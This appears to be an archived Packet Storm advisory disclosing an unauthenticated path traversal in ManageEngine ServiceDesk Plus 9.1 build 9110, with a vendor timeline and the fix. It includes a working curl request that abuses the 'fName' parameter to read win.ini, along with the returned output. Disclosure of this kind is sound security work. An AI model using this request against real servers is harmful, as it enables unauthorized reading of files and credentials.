exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine ServiceDesk Plus 9.1 Build 9110 Path Traversal

ManageEngine ServiceDesk Plus 9.1 Build 9110 Path Traversal
Posted Oct 6, 2015
Authored by xistence

ManageEngine ServiceDesk Plus versions 9.1 build 9110 and below suffer from a path traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | f8c2df4202c241dffb8fdf7f5b2b23f85c16dc7b6036aaef2466f7f1c632fa98

ManageEngine ServiceDesk Plus 9.1 Build 9110 Path Traversal

Change Mirror Download
Exploit Title: ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path
Traversal
Product: ManageEngine ServiceDesk Plus
Vulnerable Versions: 9.1 build 9110 and previous versions
Tested Version: 9.1 build 9110 (Windows)
Advisory Publication: 03/10/2015
Vulnerability Type: Unauthenticated Path Traversal
Credit: xistence <xistence[at]0x90.nl>

Product Description
-------------------

ServiceDesk Plus is an ITIL ready IT help desk software for organizations
of all sizes. With advanced ITSM functionality and easy-to-use capability,
ServiceDesk Plus helps IT support teams deliver world-class services to end
users with reduced costs and complexity. Over 100,000 organizations across
185 countries trust ServiceDesk Plus to optimize IT service desk
performance and achieve high user satisfaction.


Vulnerability Details
---------------------

The "fName" parameter is vulnerable to path traversal without the need for
any authentication.
On Windows environments, downloading files will be done with SYSTEM
privileges. This makes it possible to download any file on the filesystem.

The following example will download the "win.ini" file:

$ curl "
http://192.168.2.129:8080/workorder/FileDownload.jsp?module=support&fName=..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo


Solution
--------

Upgrade to ServiceDesk 9.1 build 9111.


Advisory Timeline
-----------------

07/10/2015 - Discovery and vendor notification
07/10/2015 - ManageEngine responsed that they will notify their development
team
09/13/2015 - No response from vendor yet, asked for status update
09/24/2015 - ManageEngine responded that they've fixed the issue and
assigned issue ID: SD-60283
09/28/2015 - Fixed ServiceDesk Plus version 9.1 build 9111 has been released
10/03/2015 - Public disclosure
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close